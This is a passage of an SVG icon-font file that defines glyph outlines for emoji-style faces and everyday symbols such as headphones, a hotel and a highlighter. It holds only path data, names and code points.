c-14.8008 -14.8008 -65.7002 -23.6006 -88.3008 -26.8008zM102.4 47.9004c5.59961 0.799805 10.2998 -3.90039 9.5 -9.40039c-3.30078 -22.5996 -12 -73.5 -26.8008 -88.2998c-19.1992 -19.2002 -50.5996 -18.9004 -70.1992 0.700195
c-19.6006 19.5996 -19.9004 51.0996 -0.800781 70.1992c14.8008 14.8008 65.7002 23.6006 88.3008 26.8008zM414.1 304.4c24 3.5 42.1006 7.39941 56.5 11.5c54.8008 -94.9004 42 -218.2 -39.1992 -299.301c-81.2002 -81.0996 -204.5 -94 -299.301 -39.1992
c4.10059 14.3994 8.10059 32.5 11.5 56.5c2.90039 20.5 -12.5 49.5996 -45.6992 45.6992c-24.1006 -3.5 -42.1006 -7.39941 -56.5 -11.5c-54.8008 94.9004 -41.9004 218.2 39.1992 299.301c81.2002 81.0996 204.5 94 299.301 39.1992
c-4.10059 -14.3994 -8.10059 -32.5 -11.5 -56.5c-2.90039 -20.5996 12.6992 -49.5996 45.6992 -45.6992zM255.7 342l-22.5 -90.5996c-2.2002 -8.60059 5.59961 -16.7002 14.5 -14.5l90.5 22.5996c13.0996 3.2998 11.5996 22.4004 -1.7998 23.5996l-52.3008 4.80078
l-4.7998 52.2998c-1.2002 13.2998 -20.2998 15 -23.5996 1.7998zM164.8 111.7c1.2998 -13.4004 20.4004 -14.9004 23.5 -1.7002l22.6006 90.5c2.19922 8.7002 -5.7002 16.7002 -14.5 14.5l-90.5 -22.5996c-13.1006 -3.30078 -11.6006 -22.4004 1.7998 -23.6006
l52.2998 -4.7998zM380.5 67.5c42.7998 42.9004 68 122.3 35.7002 167.6c-7.10059 9.90039 -21.9004 8.5 -27.2998 -2c-14.6006 -28.1992 -42.4004 -63.8994 -76.3008 -97.7998c-33.8994 -33.8994 -69.5 -61.7002 -97.7998 -76.2998
c-10.7002 -5.40039 -11.7998 -20.2998 -2 -27.2002c14.4004 -10.2002 32.1006 -14.7002 51 -14.7002c41 0 87.4004 21.1006 116.7 50.4004z" />
    <glyph glyph-name="grin-stars" unicode="&#xf587;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM94.5996 279.1c-6.19922 -1 -8.89941 -8.59961 -4.2998 -13.2998l25.4004 -24.5996l-6 -34.9004c-1 -6.2002 5.2998 -11 11 -7.89941l31.2998 16.2998l31.2002 -16.2002
c5.7002 -3.09961 12 1.7002 11 7.90039l-6 34.8994l25.3994 24.6006c4.60059 4.59961 1.90039 12.1992 -4.2998 13.1992l-34.8994 5l-15.5 31.6006c-2.90039 5.7998 -11 5.7998 -13.9004 0l-15.5 -31.6006zM248 16c60.5996 0 134.5 38.2998 143.8 93.2998
c1.90039 11.7998 -9.2002 21.6006 -20.7002 17.9004c-30.1992 -9.7002 -75.0996 -15.2002 -123.1 -15.2002s-92.9004 5.5 -123.1 15.2002c-11.4004 3.59961 -22.7002 -6.10059 -20.7002 -17.9004c9.2998 -55 83.2002 -93.2998 143.8 -93.2998zM405.7 265.9
c4.59961 4.59961 1.89941 12.1992 -4.40039 13.0996l-34.8994 5l-15.5 31.5996c-2.90039 5.80078 -11 5.80078 -13.9004 0l-15.5 -31.5996l-34.9004 -5c-6.19922 -1 -8.7998 -8.59961 -4.2998 -13.2002l25.4004 -24.5996l-6 -34.9004c-1 -6.2002 5.2998 -11 11 -7.89941
l31.2998 16.2998l31.2998 -16.2002c5.7002 -3.09961 12 1.7002 11 7.90039l-6 34.8994z" />
    <glyph glyph-name="grin-tears" unicode="&#xf588;" horiz-adv-x="639" 
d="M102.4 191.9c5.59961 0.799805 10.2998 -3.90039 9.5 -9.40039c-3.30078 -22.5996 -12 -73.5 -26.8008 -88.2998c-19.1992 -19.2002 -50.5996 -18.9004 -70.1992 0.700195c-19.6006 19.5996 -19.9004 51.0996 -0.800781 70.1992
c14.8008 14.8008 65.7002 23.6006 88.3008 26.8008zM625.8 165.1c19.2002 -19.0996 18.7998 -50.6992 -0.799805 -70.2998c-19.5996 -19.5996 -51 -19.8994 -70.2002 -0.700195c-14.7998 14.8008 -23.5996 65.7002 -26.7998 88.3008c-0.799805 5.59961 4 10.2998 9.5 9.5
c22.5996 -3.30078 73.5 -12 88.2998 -26.8008zM496.4 177.9c11.7998 -82.3008 29.8994 -100.4 35.7998 -106.301c0.899414 -1 2 -1.59961 3 -2.5c-42.7002 -74.6992 -123 -125.1 -215.2 -125.1s-172.5 50.4004 -215.2 125c1 0.900391 2.10059 1.59961 3 2.5
c5.90039 6 24 24.0996 35.7998 106.4c2.90039 20.3994 -12.5 49.5996 -45.6992 45.6992c-8.90039 -1.2998 -16.8008 -2.69922 -24.3008 -4.09961c13.7002 124 118.7 220.5 246.4 220.5s232.7 -96.5 246.4 -220.5c-7.5 1.40039 -15.4004 2.7998 -24.3008 4.09961
c-26.5996 3.80078 -49.5 -19.0996 -45.6992 -45.6992zM400 296c-23.7998 0 -52.7002 -29.2998 -55.7998 -71.4004c-0.700195 -8.5 10.7002 -11.8994 14.8994 -4.5l9.5 17c7.7002 13.7002 19.2002 21.6006 31.5 21.6006c12.3008 0 23.8008 -7.90039 31.5 -21.6006l9.5 -17
c4.10059 -7.5 15.6006 -4.09961 14.9004 4.5c-3.2998 42.1006 -32.2002 71.4004 -56 71.4004zM240 296c-23.7998 0 -52.7002 -29.2998 -55.7998 -71.4004c-0.700195 -8.5 10.7002 -11.8994 14.8994 -4.5l9.5 17c7.7002 13.7002 19.2002 21.6006 31.5 21.6006
c12.3008 0 23.8008 -7.90039 31.5 -21.6006l9.5 -17c4.10059 -7.5 15.6006 -4.09961 14.9004 4.5c-3.2998 42.1006 -32.2002 71.4004 -56 71.4004zM320 16c60.5996 0 134.5 38.2998 143.8 93.2998c1.90039 11.7998 -9.2998 21.6006 -20.7002 17.9004
c-30.1992 -9.7002 -75.0996 -15.2002 -123.1 -15.2002s-92.9004 5.5 -123.1 15.2002c-11.5 3.7002 -22.7002 -6.2002 -20.7002 -17.9004c9.2998 -55 83.2002 -93.2998 143.8 -93.2998z" />
    <glyph glyph-name="grin-tongue" unicode="&#xf589;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248c0 -106.3 -67 -196.7 -161 -232c5.59961 12.2002 9 25.7002 9 40v45.5c24.7002 16.2002 43.5 38.0996 47.7998 63.7998c1.90039 11.7998 -9.2998 21.5 -20.7002 17.9004c-30.1992 -9.7002 -75.0996 -15.2002 -123.1 -15.2002
s-92.9004 5.5 -123.1 15.2002c-11.4004 3.59961 -22.7002 -6.10059 -20.7002 -17.9004c4.2998 -25.7002 23.0996 -47.5996 47.7998 -63.7998v-45.5c0 -14.2998 3.40039 -27.7998 9 -40c-94 35.2998 -161 125.7 -161 232c0 137 111 248 248 248zM168 208
c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32zM328 208c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32zM293.1 73.4004c0.800781 -0.400391 -0.5 0.299805 19 -9.30078v-64
c0 -35.5996 -29.1992 -64.5 -64.8994 -64c-35.1006 0.400391 -63.1006 29.7002 -63.1006 64.9004v63c19.2002 9.59961 18 9 18.9004 9.40039c14.4004 6.5 31.0996 -2.2002 34.5996 -17.6006l1.80078 -7.7998c2.09961 -9.2002 15.1992 -9.2002 17.2998 0l1.7998 7.7998
c3.5 15.4004 20.2002 24.1006 34.5996 17.6006z" />
    <glyph glyph-name="grin-tongue-squint" unicode="&#xf58a;" horiz-adv-x="496" 
d="M293.1 73.4004c0.800781 -0.400391 -0.5 0.299805 19 -9.30078v-64c0 -35.5996 -29.1992 -64.5 -64.8994 -64c-35.1006 0.400391 -63.1006 29.7002 -63.1006 64.9004v63c19.2002 9.59961 18 9 18.9004 9.40039c14.4004 6.5 31.0996 -2.2002 34.5996 -17.6006
l1.80078 -7.7998c2.09961 -9.2002 15.1992 -9.2002 17.2998 0l1.7998 7.7998c3.5 15.4004 20.2002 24.1006 34.5996 17.6006zM248 440c137 0 248 -111 248 -248c0 -106.3 -67 -196.7 -161 -232c5.59961 12.2002 9 25.7002 9 40v45.5
c24.7002 16.2002 43.5 38.0996 47.7998 63.7998c1.90039 11.7998 -9.2998 21.6006 -20.7002 17.9004c-30.1992 -9.7002 -75.0996 -15.2002 -123.1 -15.2002s-92.9004 5.5 -123.1 15.2002c-11.5 3.59961 -22.7002 -6.10059 -20.7002 -17.9004
c4.2998 -25.7002 23.0996 -47.5996 47.7998 -63.7998v-45.5c0 -14.2998 3.40039 -27.7998 9 -40c-94 35.2998 -161 125.7 -161 232c0 137 111 248 248 248zM214.2 229.7c7.7002 4.7002 7.7002 15.8994 0 20.5996l-80 48c-11.6006 6.90039 -24 -7.7002 -15.4004 -18
l33.6006 -40.2998l-33.6006 -40.2998c-8.59961 -10.4004 3.90039 -24.7998 15.4004 -18zM377.2 199.7l-33.6006 40.2998l33.6006 40.2998c8.5 10.2998 -3.7002 24.9004 -15.4004 18l-80 -48c-7.7998 -4.7002 -7.7998 -15.8994 0 -20.5996l80 -48
c11.5 -6.7998 24.1006 7.59961 15.4004 18z" />
    <glyph glyph-name="grin-tongue-wink" unicode="&#xf58b;" horiz-adv-x="496" 
d="M344 264c13.2998 0 24 -10.7002 24 -24s-10.7002 -24 -24 -24s-24 10.7002 -24 24s10.7002 24 24 24zM248 440c137 0 248 -111 248 -248c0 -106.3 -67 -196.7 -161 -232c5.59961 12.2002 9 25.7002 9 40v45.5c24.7002 16.2002 43.5 38.0996 47.7998 63.7998
c1.90039 11.7998 -9.2002 21.6006 -20.7002 17.9004c-30.1992 -9.7002 -75.0996 -15.2002 -123.1 -15.2002s-92.9004 5.5 -123.1 15.2002c-11.4004 3.59961 -22.7002 -6.10059 -20.7002 -17.9004c4.2998 -25.7002 23.0996 -47.5996 47.7998 -63.7998v-45.5
c0 -14.2998 3.40039 -27.7998 9 -40c-94 35.2998 -161 125.7 -161 232c0 137 111 248 248 248zM192 215c8.40039 -7.40039 21.5996 -0.299805 20 10.7998c-4 25.2002 -34.2002 42.1006 -59.9004 42.1006c-25.6992 0 -55.8994 -16.9004 -59.8994 -42.1006
c-1.7998 -11.0996 11.2998 -18.2002 19.7998 -10.7998l9.5 8.5c14.7998 13.2002 46.2002 13.2002 61 0zM344 176c35.2998 0 64 28.7002 64 64s-28.7002 64 -64 64s-64 -28.7002 -64 -64s28.7002 -64 64 -64zM293.1 73.4004c0.800781 -0.400391 -0.5 0.299805 19 -9.30078
v-64c0 -35.5996 -29.1992 -64.5 -64.8994 -64c-35.1006 0.400391 -63.1006 29.7002 -63.1006 64.9004v63c19.2002 9.59961 18 9 18.9004 9.40039c14.4004 6.5 31.0996 -2.2002 34.5996 -17.6006l1.80078 -7.7998c2.09961 -9.2002 15.1992 -9.2002 17.2998 0l1.7998 7.7998
c3.5 15.4004 20.2002 24.1006 34.5996 17.6006z" />
    <glyph glyph-name="grin-wink" unicode="&#xf58c;" horiz-adv-x="496" 
d="M0 192c0 137 111 248 248 248s248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248zM200 240c0 17.7002 -14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32s32 14.2998 32 32zM368 215c8.5 -7.40039 21.5996 -0.200195 20 10.7998
c-4 25.2002 -34.2002 42.1006 -59.9004 42.1006c-25.6992 0 -55.8994 -16.9004 -59.8994 -42.1006c-1.7998 -11.2002 11.5 -18.2002 19.7998 -10.7998l9.5 8.5c14.7998 13.2002 46.2002 13.2002 61 0zM124.9 127.2c-11.4004 3.7002 -22.7002 -6 -20.7002 -17.9004
c9.2998 -55 83.2002 -93.2998 143.8 -93.2998s134.6 38.2998 143.8 93.2998c1.90039 11.9004 -9.39941 21.6006 -20.7002 17.9004c-30.1992 -9.7002 -75.0996 -15.2002 -123.1 -15.2002s-92.9004 5.5 -123.1 15.2002z" />
    <glyph glyph-name="grip-horizontal" unicode="&#xf58d;" horiz-adv-x="448" 
d="M96 160c17.6699 0 32 -14.3301 32 -32v-64c0 -17.6699 -14.3301 -32 -32 -32h-64c-17.6699 0 -32 14.3301 -32 32v64c0 17.6699 14.3301 32 32 32h64zM256 160c17.6699 0 32 -14.3301 32 -32v-64c0 -17.6699 -14.3301 -32 -32 -32h-64c-17.6699 0 -32 14.3301 -32 32v64
c0 17.6699 14.3301 32 32 32h64zM416 160c17.6699 0 32 -14.3301 32 -32v-64c0 -17.6699 -14.3301 -32 -32 -32h-64c-17.6699 0 -32 14.3301 -32 32v64c0 17.6699 14.3301 32 32 32h64zM96 352c17.6699 0 32 -14.3301 32 -32v-64c0 -17.6699 -14.3301 -32 -32 -32h-64
c-17.6699 0 -32 14.3301 -32 32v64c0 17.6699 14.3301 32 32 32h64zM256 352c17.6699 0 32 -14.3301 32 -32v-64c0 -17.6699 -14.3301 -32 -32 -32h-64c-17.6699 0 -32 14.3301 -32 32v64c0 17.6699 14.3301 32 32 32h64zM416 352c17.6699 0 32 -14.3301 32 -32v-64
c0 -17.6699 -14.3301 -32 -32 -32h-64c-17.6699 0 -32 14.3301 -32 32v64c0 17.6699 14.3301 32 32 32h64z" />
    <glyph glyph-name="grip-vertical" unicode="&#xf58e;" horiz-adv-x="320" 
d="M96 416c17.6699 0 32 -14.3301 32 -32v-64c0 -17.6699 -14.3301 -32 -32 -32h-64c-17.6699 0 -32 14.3301 -32 32v64c0 17.6699 14.3301 32 32 32h64zM96 256c17.6699 0 32 -14.3301 32 -32v-64c0 -17.6699 -14.3301 -32 -32 -32h-64c-17.6699 0 -32 14.3301 -32 32v64
c0 17.6699 14.3301 32 32 32h64zM96 96c17.6699 0 32 -14.3301 32 -32v-64c0 -17.6699 -14.3301 -32 -32 -32h-64c-17.6699 0 -32 14.3301 -32 32v64c0 17.6699 14.3301 32 32 32h64zM288 416c17.6699 0 32 -14.3301 32 -32v-64c0 -17.6699 -14.3301 -32 -32 -32h-64
c-17.6699 0 -32 14.3301 -32 32v64c0 17.6699 14.3301 32 32 32h64zM288 256c17.6699 0 32 -14.3301 32 -32v-64c0 -17.6699 -14.3301 -32 -32 -32h-64c-17.6699 0 -32 14.3301 -32 32v64c0 17.6699 14.3301 32 32 32h64zM288 96c17.6699 0 32 -14.3301 32 -32v-64
c0 -17.6699 -14.3301 -32 -32 -32h-64c-17.6699 0 -32 14.3301 -32 32v64c0 17.6699 14.3301 32 32 32h64z" />
    <glyph glyph-name="headphones-alt" unicode="&#xf58f;" 
d="M160 160c17.6699 0 32 -14.3496 32 -32.0596v-127.881c0 -17.6992 -14.3301 -32.0596 -32 -32.0596h-16c-35.3496 0 -64 28.71 -64 64.1201v63.7598c0 35.4199 28.6504 64.1201 64 64.1201h16zM368 160c35.3496 0 64 -28.71 64 -64.1201v-63.7598
c0 -35.4102 -28.6504 -64.1201 -64 -64.1201h-16c-17.6699 0 -32 14.3604 -32 32.0596v127.881c0 17.71 14.3301 32.0596 32 32.0596h16zM256 416c143.09 0 251.43 -119.13 256 -256v-112c0 -8.83984 -7.16016 -16 -16 -16h-16c-8.83984 0 -16 7.16016 -16 16v112
c0 114.67 -93.3301 207.8 -208 207.82c-114.67 -0.0205078 -208 -93.1504 -208 -207.82v-112c0 -8.83984 -7.16016 -16 -16 -16h-16c-8.83984 0 -16 7.16016 -16 16v112c4.57031 136.87 112.91 256 256 256z" />
    <glyph glyph-name="headset" unicode="&#xf590;" 
d="M192 240v-112c0 -17.6699 -14.3301 -32 -32 -32h-16c-35.3496 0 -64 28.6504 -64 64v48c0 35.3496 28.6504 64 64 64h16c17.6699 0 32 -14.3301 32 -32zM368 96h-16c-17.6699 0 -32 14.3301 -32 32v112c0 17.6699 14.3301 32 32 32h16c35.3496 0 64 -28.6504 64 -64v-48
c0 -35.3496 -28.6504 -64 -64 -64zM256 448c142.82 0 251.42 -118.83 256 -256v-165.72c0 -49.8604 -40.4199 -90.2803 -90.2803 -90.2803h-181.72c-26.5098 0 -48 21.4902 -48 48s21.4902 48 48 48h32c26.5098 0 48 -21.4902 48 -48h101.72
c23.3506 0 42.2803 18.9297 42.2803 42.2803c0 0 -0.0400391 163.29 -0.120117 165.72h0.120117c0 114.69 -93.3096 208 -208 208s-208 -93.3096 -208 -208v-16c0 -8.83984 -7.16016 -16 -16 -16h-16c-8.83984 0 -16 7.16016 -16 16v16c4.58008 137.17 113.18 256 256 256z
" />
    <glyph glyph-name="highlighter" unicode="&#xf591;" horiz-adv-x="544" 
d="M0 -31.9805l68.3301 70.4707l67.04 -67.04l-35.4502 -35.4502zM124.61 208.03l41.5195 35.4395l173.34 -173.34l-35.5498 -41.6396c-9.5 -10.7705 -24.4199 -14.9805 -38.1504 -10.7803l-42.7393 13.0801l-50.8604 -50.8604l-96.2295 96.2305l50.9297 50.9395
l-13.0498 42.8301c-0.876953 2.87891 -1.58887 7.65625 -1.58887 10.665c0 9.11328 5.5459 21.4043 12.3789 27.4355zM527.92 368.73c20.5 -20.5 21.5303 -53.3906 2.34961 -75.1309l-169.949 -199.06l-169.771 169.78l199.05 169.96
c21.7402 19.1699 54.6309 18.1396 75.1201 -2.35059z" />
    <glyph glyph-name="hot-tub" unicode="&#xf593;" 
d="M414.21 270.35c-3.15039 25.3906 -14.6104 47.9707 -31.9697 62.1406c-27.7305 22.6299 -45.79 58.0498 -50.1299 97.1602c-1.09082 9.7793 6.48926 18.3496 16 18.3496h16.1201c7.98926 0 14.7295 -6.13965 15.7393 -14.3398
c3.16016 -25.4004 14.6104 -47.9805 31.9805 -62.1504c27.7295 -22.6299 45.79 -58.0498 50.1299 -97.1602c1.08008 -9.7793 -6.49023 -18.3496 -16 -18.3496h-16.1201c-8 0 -14.7295 6.13965 -15.75 14.3496zM306.21 270.35
c-3.15039 25.3906 -14.6104 47.9707 -31.9697 62.1406c-27.7305 22.6299 -45.79 58.0498 -50.1299 97.1602c-1.09082 9.7793 6.48926 18.3496 16 18.3496h16.1201c7.98926 0 14.7295 -6.13965 15.7393 -14.3398c3.16016 -25.4004 14.6104 -47.9805 31.9805 -62.1504
c27.7295 -22.6299 45.79 -58.0498 50.1299 -97.1602c1.08008 -9.7793 -6.49023 -18.3496 -16 -18.3496h-16.1201c-8 0 -14.7295 6.13965 -15.75 14.3496zM480 192c17.6699 0 32 -14.3301 32 -32v-160c0 -35.3496 -28.6504 -64 -64 -64h-384c-35.3496 0 -64 28.6504 -64 64
v224c0 35.3496 28.6504 64 64 64h42.6699h0.00292969c11.7754 0 28.9775 -5.73438 38.3975 -12.7998l110.93 -83.2002h224zM128 8v112c0 4.41992 -3.58008 8 -8 8h-16c-4.41992 0 -8 -3.58008 -8 -8v-112c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8zM224 8v112
c0 4.41992 -3.58008 8 -8 8h-16c-4.41992 0 -8 -3.58008 -8 -8v-112c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8zM320 8v112c0 4.41992 -3.58008 8 -8 8h-16c-4.41992 0 -8 -3.58008 -8 -8v-112c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8zM416 8
v112c0 4.41992 -3.58008 8 -8 8h-16c-4.41992 0 -8 -3.58008 -8 -8v-112c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8zM64 320c-35.3496 0 -64 28.6504 -64 64s28.6504 64 64 64s64 -28.6504 64 -64s-28.6504 -64 -64 -64z" />
    <glyph glyph-name="hotel" unicode="&#xf594;" horiz-adv-x="576" 
d="M560 384h-16v-384h16c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-240v80c0 8.7998 -7.2002 16 -16 16h-32c-8.7998 0 -16 -7.2002 -16 -16v-80h-240c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h15.9805v384h-15.9805
c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h544c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16zM256 339.2v-38.4004c0 -6.39941 6.40039 -12.7998 12.7998 -12.7998h38.4004c6.39941 0 12.7998 6.40039 12.7998 12.7998v38.4004
c0 6.39941 -6.40039 12.7998 -12.7998 12.7998h-38.4004c-6.39941 0 -12.7998 -6.40039 -12.7998 -12.7998zM256 243.2v-38.4004c0 -6.39941 6.40039 -12.7998 12.7998 -12.7998h38.4004c6.39941 0 12.7998 6.40039 12.7998 12.7998v38.4004
c0 6.39941 -6.40039 12.7998 -12.7998 12.7998h-38.4004c-6.39941 0 -12.7998 -6.40039 -12.7998 -12.7998zM128 339.2v-38.4004c0 -6.39941 6.40039 -12.7998 12.7998 -12.7998h38.4004c6.39941 0 12.7998 6.40039 12.7998 12.7998v38.4004
c0 6.39941 -6.40039 12.7998 -12.7998 12.7998h-38.4004c-6.39941 0 -12.7998 -6.40039 -12.7998 -12.7998zM179.2 192c6.39941 0 12.7998 6.40039 12.7998 12.7998v38.4004c0 6.39941 -6.40039 12.7998 -12.7998 12.7998h-38.4004
c-6.39941 0 -12.7998 -6.40039 -12.7998 -12.7998v-38.4004c0 -6.39941 6.40039 -12.7998 12.7998 -12.7998h38.4004zM192 64h192c0 53.0195 -42.9805 96 -96 96s-96 -42.9805 -96 -96zM448 204.8v38.4004c0 6.39941 -6.40039 12.7998 -12.7998 12.7998h-38.4004
c-6.39941 0 -12.7998 -6.40039 -12.7998 -12.7998v-38.4004c0 -6.39941 6.40039 -12.7998 12.7998 -12.7998h38.4004c6.39941 0 12.7998 6.40039 12.7998 12.7998zM448 300.8v38.4004c0 6.39941 -6.40039 12.7998 -12.7998 12.7998h-38.4004
c-6.39941 0 -12.7998 -6.40039 -12.7998 -12.7998v-38.4004c0 -6.39941 6.40039 -12.7998 12.7998 -12.7998h38.4004c6.39941 0 12.7998 6.40039 12.7998 12.7998z" />
    <glyph glyph-name="joint" unicode="&#xf595;" horiz-adv-x="640" 
d="M444.34 266.9c-35.7803 25.0693 -60.3398 63.0098 -60.3398 106.699v66.4004c0 4.41992 3.58008 8 8 8h48c4.41992 0 8 -3.58008 8 -8v-62.3096c0 -29.0303 15.8496 -54.71 39.6602 -71.3203c35.3301 -24.6504 56.3398 -64.8203 56.3398 -108.061v-30.3096
c0 -4.41992 -3.58008 -8 -8 -8h-48c-4.41992 0 -8 3.58008 -8 8v30.3096c0 27.4307 -13.2803 52.9102 -35.6602 68.5908zM194.97 89.0195c22.3701 3.60059 45.0801 -4.30957 59.8203 -21.5098l112.72 -131.51h-88.5693c-98.6406 0 -195.29 27.7197 -278.94 80
c59.6904 37.3096 126.03 61.9297 194.97 73.0195zM553.28 360.91c54.3096 -36.4102 86.7197 -97.1602 86.7197 -162.601v-30.3096c0 -4.41992 -3.58008 -8 -8 -8h-48c-4.41992 0 -8 3.58008 -8 8v30.3096c0 50.1504 -25.21 96.6504 -67.3604 123.99
c-18.4697 11.9805 -28.6396 33.3701 -28.6396 55.3906v62.3096c0 4.41992 3.58008 8 8 8h48c4.41992 0 8 -3.58008 8 -8v-62.3096c0 -6.82031 3.61035 -12.9805 9.28027 -16.7803zM360.89 95.9502h0.108398c16.2441 0 38.0049 -10.0127 48.5723 -22.3506l117.949 -137.6
h-88.4492h-0.00292969c-16.248 0 -38.0146 10.0127 -48.5869 22.3496l-117.801 137.431c1.40039 0.0195312 53.8105 0.109375 88.21 0.169922zM616 96c13.25 0 24 -10.7402 24 -24v-112c0 -13.25 -10.75 -24 -24 -24h-17.4199h-0.00292969
c-16.248 0 -38.0146 10.0127 -48.5869 22.3496l-117.99 137.65h184z" />
    <glyph glyph-name="kiss" unicode="&#xf596;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM168 208c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32zM304 52c0 13 -13.4004 27.2998 -35.2002 36.4004
c21.7998 8.69922 35.2002 23 35.2002 36c0 19.1992 -28.7002 41.5 -71.5 44c-8.40039 1.09961 -12.2002 -11.8008 -3.59961 -15.4004l17 -7.2002c13 -5.5 20.7998 -13.5 20.7998 -21.5s-7.7998 -16 -20.7998 -21.5l-17 -7.2002c-6.10059 -2.59961 -6 -12.2998 0 -14.7998
l17 -7.2002c13 -5.5 20.7998 -13.5 20.7998 -21.5s-7.7998 -16 -20.7998 -21.5l-17 -7.19922c-8.5 -3.60059 -4.90039 -16.2002 3.59961 -15.4004c42.7998 2.5 71.5 24.7998 71.5 44zM328 208c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32
s14.2998 -32 32 -32z" />
    <glyph glyph-name="kiss-beam" unicode="&#xf597;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM209 220.1c4.2002 -7.5 15.5996 -4 15.0996 4.5c-3.2998 42.1006 -32.1992 71.4004 -56 71.4004c-23.7998 0 -52.6992 -29.2998 -56 -71.4004
c-0.699219 -8.5 10.7002 -11.8994 14.9004 -4.5l9.5 17c7.7002 13.7002 19.2002 21.6006 31.5 21.6006s23.7998 -7.90039 31.5 -21.6006zM304 52c0 13 -13.4004 27.2998 -35.2002 36.4004c21.7998 8.69922 35.2002 23 35.2002 36c0 19.1992 -28.7002 41.5 -71.5 44
c-8.40039 1.09961 -12.2002 -11.8008 -3.59961 -15.4004l17 -7.2002c13 -5.5 20.7998 -13.5 20.7998 -21.5s-7.7998 -16 -20.7998 -21.5l-17 -7.2002c-6.10059 -2.59961 -6 -12.2998 0 -14.7998l17 -7.2002c13 -5.5 20.7998 -13.5 20.7998 -21.5s-7.7998 -16 -20.7998 -21.5
l-17 -7.19922c-8.5 -3.60059 -4.90039 -16.2002 3.59961 -15.4004c42.7998 2.5 71.5 24.7998 71.5 44zM369 220.1c4.2002 -7.5 15.5996 -4 15.0996 4.5c-3.2998 42.1006 -32.1992 71.4004 -56 71.4004c-23.7998 0 -52.6992 -29.2998 -56 -71.4004
c-0.699219 -8.5 10.8008 -11.7998 14.9004 -4.5l9.5 17c7.7002 13.7002 19.2002 21.6006 31.5 21.6006s23.7998 -7.90039 31.5 -21.6006z" />
    <glyph glyph-name="kiss-wink-heart" unicode="&#xf598;" horiz-adv-x="503" 
d="M501.1 45.5c9.2002 -23.9004 -4.39941 -49.4004 -28.5 -55.7002l-83 -21.5c-5.39941 -1.39941 -10.8994 1.7998 -12.3994 7.10059l-22.9004 82.5996c-6.59961 24 8.7998 48.5996 34 52.5996c22 3.5 43.1006 -11.5996 49 -33l2.2998 -8.39941l8.40039 2.2002
c21.5996 5.59961 45.0996 -5.10059 53.0996 -25.9004zM323.5 49.5c0 0 23.5996 -83.9004 23.9004 -84.5996c-30.5 -13.4004 -64 -20.9004 -99.4004 -20.9004c-137 0 -248 111 -248 248s111 248 248 248s248 -111 248 -248c0 -31.7998 -6.2002 -62.0996 -17.0996 -90
c-6 1.5 -12.2002 2.7998 -18.6006 2.90039c-29.0996 49.7998 -98.0996 50.5996 -127.8 4.2998c-11.2998 -17.7002 -14.5996 -39.4004 -9 -59.7002zM168 208c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32zM288 52
c0 13 -13.4004 27.2998 -35.2002 36.4004c21.7998 8.69922 35.2002 23 35.2002 36c0 19.1992 -28.7002 41.5 -71.5 44c-8.2002 1.19922 -12.4004 -11.7002 -3.59961 -15.4004l17 -7.2002c13 -5.5 20.7998 -13.5 20.7998 -21.5s-7.7998 -16 -20.7998 -21.5l-17 -7.2002
c-5.7002 -2.5 -6 -12.2998 0 -14.7998l17 -7.2002c13 -5.5 20.7998 -13.5 20.7998 -21.5s-7.7998 -16 -20.7998 -21.5l-17 -7.19922c-8.5 -3.60059 -4.90039 -16.2002 3.59961 -15.4004c42.7998 2.5 71.5 24.7998 71.5 44zM304 231l9.7002 8.5
c14.7998 13.2002 46.2002 13.2002 61 0l9.5 -8.5c8.5 -7.5 21.5 -0.299805 19.7998 10.7998c-4 25.2002 -34.2002 42.1006 -59.9004 42.1006c-25.6992 0 -55.8994 -16.9004 -59.8994 -42.1006c-1.7998 -11.2002 11.5 -18.2002 19.7998 -10.7998z" />
    <glyph glyph-name="laugh" unicode="&#xf599;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM328 288c-17.7002 0 -32 -14.2998 -32 -32s14.2998 -32 32 -32s32 14.2998 32 32s-14.2998 32 -32 32zM168 288c-17.7002 0 -32 -14.2998 -32 -32s14.2998 -32 32 -32
s32 14.2998 32 32s-14.2998 32 -32 32zM256 16c73.4004 0 134 55 142.9 126c1.19922 9.59961 -6.30078 18 -15.9004 18h-270c-9.59961 0 -17.0996 -8.5 -15.9004 -18c8.90039 -71 69.5 -126 142.9 -126h16z" />
    <glyph glyph-name="laugh-beam" unicode="&#xf59a;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM272 240.6c-0.700195 -8.59961 10.9004 -11.8994 15.0996 -4.5l9.5 17c7.7002 13.7002 19.2002 21.6006 31.5 21.6006c12.3008 0 23.8008 -7.90039 31.5 -21.6006l9.5 -17
